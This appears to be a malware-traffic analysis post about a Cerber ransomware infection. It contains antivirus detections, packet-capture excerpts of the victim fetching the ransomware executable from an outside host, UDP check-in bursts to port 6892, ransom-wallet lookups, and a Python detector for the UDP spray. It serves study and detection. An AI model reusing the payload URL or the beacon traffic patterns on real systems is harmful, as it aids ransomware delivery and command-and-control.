Malspam E-mail Leads to Ransomware Cerber/Zerber Infection 4fv3b5.exe Vector FULL PCAP FILE DOWNLOAD Traffic Sample

Download attachment: 1 pcap (121 KB), date added December 16, 2016 8:55 am, added by admin, 113 downloads.
Antivirus scan results for the downloaded executable:

SHA256: 2f2b2e30abe71f9a93d6ad7418facf0fcc1323fa0017682f254becf99848e43c
File name: 4fv3b5.exe
Detection ratio: 39 / 56
Analysis date: 2016-12-16 08:39:47 UTC

Engine                   Detection                          Update
Avira (no cloud)         TR/Dropper.btuyq                   20161216
BitDefender              Trojan.GenericKD.3903694           20161216
Bkav                     W32.DominasaAST.Trojan             20161215
CAT-QuickHeal            TrojanRansom.Zerber                20161216
CrowdStrike Falcon (ML)  malicious_confidence_100% (W)      20161024
DrWeb                    Trojan.Encoder.7233                20161216
ESET-NOD32               Win32/Filecoder.Cerber.C           20161216
Emsisoft                 Trojan.GenericKD.3903694 (B)       20161216
F-Secure                 Trojan.GenericKD.3903694           20161216
Fortinet                 W32/Malicious_Behavior.VEX         20161216
GData                    Trojan.GenericKD.3903694           20161216
K7AntiVirus              Trojan ( 004ff8881 )               20161216
K7GW                     Trojan ( 004ff8881 )               20161216
Kaspersky                Trojan-Ransom.Win32.Zerber.apnm    20161216
Malwarebytes             Ransom.Locky                       20161216
McAfee                   Generic.atf                        20161216
McAfee-GW-Edition        BehavesLike.Win32.Ransom.dc        20161216
eScan                    Trojan.GenericKD.3903694           20161216
Microsoft                Ransom:Win32/Genasom!rfn           20161216

btc.blockr.io displays a page on how to pay to get your data back, and Cerber has a speech program that announces that your data has been encrypted and that you must follow the instructions to get your information back:

Example of files that were encrypted and protected:

The domain name ftoxmpdipwobp4qy.joa688.top returned NXDOMAIN and was not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
E..W..@........fH......P.n......P.......GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.monitorspeakers.net
Connection: Keep-Alive

2016-12-16 01:29:06.602141 IP 192.168.1.102.50077 > 216.58.218.234.443: Flags [.], seq 1936354787:1936354788, ack 530483529, win 254, length 1
E..)w.@........f.:......sjm....IP.............
2016-12-16 01:29:09.071199 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [.], ack 255316, win 735, length 0
E..(..@........fH......P.n.2....P....?........
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
E..&$.....C....f.1..........hi00889070........
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
E..&.D....KC...f.1..........hi00889070........
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
E..&xz.........f.1..........hi00889070........
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
E..&A.....&....f.1..........hi00889070........
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
E..&......]....f.1..........hi00889070........
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
E..&3<....5G...f.1..........hi00889070........
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
E..&V......p...f.1..........hi00889070........
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10
E..&o..........f.1..........hi00889070........
2016-12-16 01:29:16.675334 IP 192.168.1.102.59297 > 15.49.2.8.6892: UDP, length 10
E..&s..........f.1..........hi00889070........
2016-12-16 01:29:16.675343 IP 192.168.1.102.59297 > 15.49.2.9.6892: UDP, length 10
E..&J..........f.1.     ........hi00889070........
2016-12-16 01:29:16.675437 IP 192.168.1.102.59297 > 15.49.2.10.6892: UDP, length 10
E..&/L....92...f.1..........hi00889070........
2016-12-16 01:29:16.675444 IP 192.168.1.102.59297 > 15.49.2.11.6892: UDP, length 10
E..&......Q....f.1..........hi00889070........
2016-12-16 01:29:16.675595 IP 192.168.1.102.59297 > 15.49.2.12.6892: UDP, length 10
E..&]..........f.1..........hi00889070........
2016-12-16 01:29:16.675610 IP 192.168.1.102.59297 > 15.49.2.13.6892: UDP, length 10
E..&d......a...f.1..........hi00889070........
2016-12-16 01:29:16.675616 IP 192.168.1.102.59297 > 15.49.2.14.6892: UDP, length 10
E..&.D....g6...f.1..........hi00889070........
2016-12-16 01:29:16.675651 IP 192.168.1.102.59297 > 15.49.2.15.6892: UDP, length 10
E..&8...../....f.1..........hi00889070........

2016-12-16 01:29:16.676470 IP 192.168.1.102.59297 > 122.1.13.0.6892: UDP, length 10
E..&:N.....i...fz.........r.hi00889070........
2016-12-16 01:29:16.676519 IP 192.168.1.102.59297 > 122.1.13.1.6892: UDP, length 10
E..&...........fz.........r.hi00889070........
2016-12-16 01:29:16.676602 IP 192.168.1.102.59297 > 122.1.13.2.6892: UDP, length 10
E..&f..........fz.........r.hi00889070........
2016-12-16 01:29:16.676655 IP 192.168.1.102.59297 > 122.1.13.3.6892: UDP, length 10
E..&_x.....<...fz.........r.hi00889070........
2016-12-16 01:29:16.676708 IP 192.168.1.102.59297 > 122.1.13.4.6892: UDP, length 10
E..&.>.....u...fz.........r.hi00889070........
2016-12-16 01:29:16.676714 IP 192.168.1.102.59297 > 122.1.13.5.6892: UDP, length 10
E..&-..........fz.........r.hi00889070........
2016-12-16 01:29:16.676763 IP 192.168.1.102.59297 > 122.1.13.6.6892: UDP, length 10
E..&H..........fz.........r.hi00889070........
2016-12-16 01:29:16.676849 IP 192.168.1.102.59297 > 122.1.13.7.6892: UDP, length 10
E..&q..........fz.........r.hi00889070........
2016-12-16 01:29:16.676901 IP 192.168.1.102.59297 > 122.1.13.8.6892: UDP, length 10
E..&m|.....3...fz.........r.hi00889070........
2016-12-16 01:29:16.676907 IP 192.168.1.102.59297 > 122.1.13.9.6892: UDP, length 10
E..&T..........fz..     ......r.hi00889070........
2016-12-16 01:29:16.676956 IP 192.168.1.102.59297 > 122.1.13.10.6892: UDP, length 10
E..&1..........fz........r.hi00889070........
2016-12-16 01:29:16.677043 IP 192.168.1.102.59297 > 122.1.13.11.6892: UDP, length 10
E..&.Z.....R...fz.........r.hi00889070........
2016-12-16 01:29:16.677097 IP 192.168.1.102.59297 > 122.1.13.12.6892: UDP, length 10
E..&C..........fz.........r.hi00889070........
2016-12-16 01:29:16.677103 IP 192.168.1.102.59297 > 122.1.13.13.6892: UDP, length 10
E..&z.....w....fz.........r.hi00889070........
2016-12-16 01:29:16.677150 IP 192.168.1.102.59297 > 122.1.13.14.6892: UDP, length 10
E..&...........fz.........r.hi00889070........
2016-12-16 01:29:16.677234 IP 192.168.1.102.59297 > 122.1.13.15.6892: UDP, length 10
E..&&J.....^...fz.........r.hi00889070........
2016-12-16 01:29:16.677288 IP 192.168.1.102.59297 > 122.1.13.16.6892: UDP, length 10
E..&Q..........fz.........r.hi00889070........
2016-12-16 01:29:16.677294 IP 192.168.1.102.59297 > 122.1.13.17.6892: UDP, length 10
E..&h..........fz.........r.hi00889070........
2016-12-16 01:29:16.677391 IP 192.168.1.102.59297 > 122.1.13.18.6892: UDP, length 10
E..&.L.....Y...fz.........r.hi00889070........

2016-12-16 01:29:16.678089 IP 192.168.1.102.59297 > 194.165.16.1.6892: UDP, length 10
E..&o.....7P...f..........'Uhi00889070........
2016-12-16 01:29:16.678161 IP 192.168.1.102.59297 > 194.165.16.2.6892: UDP, length 10
E..&...........f..........'Thi00889070........
2016-12-16 01:29:16.678172 IP 192.168.1.102.59297 > 194.165.16.3.6892: UDP, length 10
E..&3+....s....f..........'Shi00889070........
2016-12-16 01:29:16.678223 IP 192.168.1.102.59297 > 194.165.16.4.6892: UDP, length 10
E..&xk.........f..........'Rhi00889070........
2016-12-16 01:29:16.678305 IP 192.168.1.102.59297 > 194.165.16.5.6892: UDP, length 10
E..&A.....eT...f..........'Qhi00889070........
2016-12-16 01:29:16.678357 IP 192.168.1.102.59297 > 194.165.16.6.6892: UDP, length 10
E..&$......y...f..........'Phi00889070........
2016-12-16 01:29:16.678363 IP 192.168.1.102.59297 > 194.165.16.7.6892: UDP, length 10
E..&.c.........f..........'Ohi00889070........
2016-12-16 01:29:16.678411 IP 192.168.1.102.59297 > 194.165.16.8.6892: UDP, length 10
E..&.1.........f..........'Nhi00889070........
2016-12-16 01:29:16.678497 IP 192.168.1.102.59297 > 194.165.16.9.6892: UDP, length 10
E..&9.....n....f...     ......'Mhi00889070........
2016-12-16 01:29:16.678550 IP 192.168.1.102.59297 > 194.165.16.10.6892: UDP, length 10
E..&].....I?...f..........'Lhi00889070........
2016-12-16 01:29:16.678556 IP 192.168.1.102.59297 > 194.165.16.11.6892: UDP, length 10
E..&d.....B....f..........'Khi00889070........
2016-12-16 01:29:16.678653 IP 192.168.1.102.59297 > 194.165.16.12.6892: UDP, length 10
E..&/i....w....f..........'Jhi00889070........
2016-12-16 01:29:16.678659 IP 192.168.1.102.59297 > 194.165.16.13.6892: UDP, length 10
E..&.......j...f..........'Ihi00889070........
2016-12-16 01:29:16.678737 IP 192.168.1.102.59297 > 194.165.16.14.6892: UDP, length 10
E..&s.....3C...f..........'Hhi00889070........
2016-12-16 01:29:16.678791 IP 192.168.1.102.59297 > 194.165.16.15.6892: UDP, length 10
E..&Ju....\....f..........'Ghi00889070........
2016-12-16 01:29:16.678797 IP 192.168.1.102.59297 > 194.165.16.16.6892: UDP, length 10
E..&=.....ie...f..........'Fhi00889070........
2016-12-16 01:29:16.678845 IP 192.168.1.102.59297 > 194.165.16.17.6892: UDP, length 10
E..&.m.........f..........'Ehi00889070........
2016-12-16 01:29:16.678930 IP 192.168.1.102.59297 > 194.165.16.18.6892: UDP, length 10
E..&ay....E....f..........'Dhi00889070........
2016-12-16 01:29:16.678982 IP 192.168.1.102.59297 > 194.165.16.19.6892: UDP, length 10

2016-12-16 01:29:17.684432 IP 192.168.1.102.59297 > 194.165.17.0.6892: UDP, length 10
E..&    ......i...f..........&Vhi00889070........
2016-12-16 01:29:17.684438 IP 192.168.1.102.59297 > 194.165.17.1.6892: UDP, length 10
E..&2y....s....f..........&Uhi00889070........
2016-12-16 01:29:17.684476 IP 192.168.1.102.59297 > 194.165.17.2.6892: UDP, length 10
E..&UE....P....f..........&Thi00889070........
2016-12-16 01:29:17.684598 IP 192.168.1.102.59297 > 194.165.17.3.6892: UDP, length 10
E..&n.....7|...f..........&Shi00889070........
2016-12-16 01:29:17.684620 IP 192.168.1.102.59297 > 194.165.17.4.6892: UDP, length 10
E..&'.....~-...f..........&Rhi00889070........
2016-12-16 01:29:17.684626 IP 192.168.1.102.59297 > 194.165.17.5.6892: UDP, length 10
E..& ..........f..........&Qhi00889070........
2016-12-16 01:29:17.684754 IP 192.168.1.102.59297 > 194.165.17.6.6892: UDP, length 10
E..&{=....*....f..........&Phi00889070........
2016-12-16 01:29:17.684775 IP 192.168.1.102.59297 > 194.165.17.7.6892: UDP, length 10
E..&D.....a ...f..........&Ohi00889070........
2016-12-16 01:29:17.684801 IP 192.168.1.102.59297 > 194.165.17.8.6892: UDP, length 10
E..&`.....Es...f..........&Nhi00889070........
2016-12-16 01:29:17.684908 IP 192.168.1.102.59297 > 194.165.17.9.6892: UDP, length 10
E..&gK....>....f...     ......&Mhi00889070........
2016-12-16 01:29:17.684929 IP 192.168.1.102.59297 > 194.165.17.10.6892: UDP, length 10
E..&...........f..........&Lhi00889070........
2016-12-16 01:29:17.684955 IP 192.168.1.102.59297 > 194.165.17.11.6892: UDP, length 10
E..&;.....jR...f..........&Khi00889070........
2016-12-16 01:29:17.685063 IP 192.168.1.102.59297 > 194.165.17.12.6892: UDP, length 10
E..&r.....3....f..........&Jhi00889070........
2016-12-16 01:29:17.685085 IP 192.168.1.102.59297 > 194.165.17.13.6892: UDP, length 10
E..&IC....\....f..........&Ihi00889070........
:

2016-12-16 01:29:30.058704 IP 192.168.1.102.59298 > 15.49.2.0.6892: UDP, length 24
E..4$.....C....f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058735 IP 192.168.1.102.59298 > 15.49.2.1.6892: UDP, length 24
E..4.d....K....f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058741 IP 192.168.1.102.59298 > 15.49.2.2.6892: UDP, length 24
E..4x..........f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058852 IP 192.168.1.102.59298 > 15.49.2.3.6892: UDP, length 24
E..4A.....&....f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058864 IP 192.168.1.102.59298 > 15.49.2.4.6892: UDP, length 24
E..4.   ....]m...f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058905 IP 192.168.1.102.59298 > 15.49.2.5.6892: UDP, length 24
E..43\....5....f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059018 IP 192.168.1.102.59298 > 15.49.2.6.6892: UDP, length 24
E..4V2.....B...f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
E..4p......m...f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
E..4s..........f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059145 IP 192.168.1.102.59298 > 15.49.2.9.6892: UDP, length 24
E..4J..........f.1.     ..... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059156 IP 192.168.1.102.59298 > 15.49.2.10.6892: UDP, length 24
E..4/l....9....f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059223 IP 192.168.1.102.59298 > 15.49.2.11.6892: UDP, length 24
E..4......Q....f.1....... 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059292 IP 192.168.1.102.59298 > 15.49.2.12.6892: UDP, length 24
E..4^......c...f.1....... 2.2107cd482fd40088950110cf
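
The UDP bursts above (one source port, equal-length datagrams, the same "hi00889070" payload, consecutive destination addresses on port 6892 within a few milliseconds) are the pattern a network monitor can key on. The following is an added example, not code from the original post: it parses tcpdump summary lines like those above and flags such a spray. The sample lines are copied from this capture plus one benign DNS query; the thresholds (8 hosts within 2 seconds) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: UDP summary lines copied from the capture above (a full
# batch to 15.49.2.0-7, two stragglers to 194.165.16.x) plus a benign DNS query.
SAMPLE = """\
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10
2016-12-16 01:29:16.678089 IP 192.168.1.102.59297 > 194.165.16.1.6892: UDP, length 10
2016-12-16 01:29:16.678161 IP 192.168.1.102.59297 > 194.165.16.2.6892: UDP, length 10
2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
"""

# tcpdump summary line for a UDP datagram: "<date> <time> IP <src>.<sport> > <dst>.<dport>: UDP, length <n>"
UDP_RE = re.compile(r"^(?P<ts>\S+ \S+) IP (?P<src>[\d.]+)\.\d+ > "
                    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): UDP, length (?P<len>\d+)$")

def parse_udp(lines):
    """Yield (timestamp, src, dst, dport, length) for every UDP summary line; skip the rest."""
    for line in lines:
        m = UDP_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["src"], m["dst"], int(m["dport"]), int(m["len"])

def find_udp_sprays(lines, min_hosts=8, window_s=2.0):
    """Flag a source that sends equal-length UDP datagrams to at least min_hosts distinct
    addresses in one /24 on one destination port within window_s seconds (thresholds are
    assumptions tuned to this capture, not vendor defaults)."""
    groups = defaultdict(list)  # (src, dport, length, /24) -> [(ts, dst), ...]
    for ts, src, dst, dport, length in parse_udp(lines):
        net24 = dst.rsplit(".", 1)[0] + ".0/24"
        groups[(src, dport, length, net24)].append((ts, dst))
    alerts = []
    for (src, dport, length, net24), events in groups.items():
        events.sort()
        span = (events[-1][0] - events[0][0]).total_seconds()
        hosts = {dst for _, dst in events}
        if len(hosts) >= min_hosts and span <= window_s:
            alerts.append({"src": src, "dport": dport, "length": length, "net": net24,
                           "hosts": len(hosts), "span_s": round(span, 3)})
    return alerts
```

Run on the sample, the 15.49.2.0/24 batch is reported and the two 194.165.16.x packets and the DNS query are not; on a full capture the same logic would also report the 122.1.13.x and 194.165.17.x batches.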

2016-12-16 01:32:13.634751 IP 192.168.1.102.50425 > 75.75.75.75.53: 35627+ A? ftoxmpdipwobp4qy.joa688.top. (45)
E..I...........fKKKK...5.5~R.+...........ftoxmpdipwobp4qy.joa688.top.....

2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
E..;...........fKKKK.(.5.'...m...........btc.blockr.io.....
2016-12-16 01:32:14.511003 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [S], seq 3315200002, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4c.@...9-...f.......P.......... .w...............
2016-12-16 01:32:14.643338 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [.], ack 604253513, win 256, length 0
E..(c.@...98...f.......P....$.-IP.............
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
E..&c.@...89...f.......P....$.-IP...>...GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io/api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757
Connection: Keep-Alive

2016-12-16 01:32:15.111089 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 254:534, ack 25007, win 256, length 280: HTTP: GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
E..@c.@...8....f.......P....$...P...!...GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io
Connection: Keep-Alive

2016-12-16 01:33:53.309648 IP 192.168.1.102.49833 > 91.121.230.214.443: Flags [.], ack 544, win 948, length 0

The data returned by the btc.blockr.io API call (transaction list for the Bitcoin address 17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt), one transaction per line; the capture of the response ends mid-record:

{"status":"success","data":{"address":"17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt","limit_txs":200,"nb_txs":145,"nb_txs_displayed":145,"txs":[
 {"tx":"5712191df3ff261e492696e00078be2b582bbdb94af2c35d952237432404b4b3","time_utc":"2016-12-16T00:41:46Z","confirmations":43,"amount":0.45874077,"amount_multisig":0},
 {"tx":"60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea","time_utc":"2016-12-16T00:17:25Z","confirmations":44,"amount":-0.46037778,"amount_multisig":0},
 {"tx":"9ed8fab7df73a40f41616368ae8c4630128b9acc3117520da03908702a5c7918","time_utc":"2016-12-15T23:17:13Z","confirmations":52,"amount":0.46037778,"amount_multisig":0},
 {"tx":"f1672adba2f8245faf6568462bb38b47ee436156803646f8437e203e59cb435c","time_utc":"2016-12-15T23:03:28Z","confirmations":53,"amount":-0.46197889,"amount_multisig":0},
 {"tx":"3c85a60667beacfe81aa52b323a88f037127716f5f8e421b6d9d371ac11c9bd1","time_utc":"2016-12-14T22:05:11Z","confirmations":184,"amount":0.46197889,"amount_multisig":0},
 {"tx":"eeb2704655f9c41690bfd8acf760a4a4f1f3f503eebe60cedc6065748256a6f7","time_utc":"2016-12-14T21:56:23Z","confirmations":185,"amount":-0.46369457,"amount_multisig":0},
 {"tx":"3305874b3e467e9d5412fed58c59f71966464ba6098b028eeec9587894d6a3f2","time_utc":"2016-12-14T09:44:57Z","confirmations":260,"amount":0.46369457,"amount_multisig":0},
 {"tx":"2829831beec7140aa1f89305c0e93ee181e6aa5b1fd146b739191263e137dca5","time_utc":"2016-12-14T09:17:29Z","confirmations":261,"amount":-0.46503174,"amount_multisig":0},
 {"tx":"d408af4439c865d89571de27c348fb2593fcf579773971ded586caa4a00d476f","time_utc":"2016-12-13T13:41:22Z","confirmations":377,"amount":0.46503174,"amount_multisig":0},
 {"tx":"149170830550ec8c023ab3e3a41c6865dcb55d2c86a6de51d0acb5ed7ff30463","time_utc":"2016-12-13T13:35:55Z","confirmations":378,"amount":-0.46647336,"amount_multisig":0},
 {"tx":"95b41dd061f3b37dd4a47444cc644cf03fcd6cc9b8e4ab7b7b8464729ed0f659","time_utc":"2016-12-13T12:22:43Z","confirmations":388,"amount":0.46647336,"amount_multisig":0},
 {"tx":"d6452ee98ef8b5007dc22024a9408dd10f7f6ecd5b5b733850e005b6fb1c97f6"

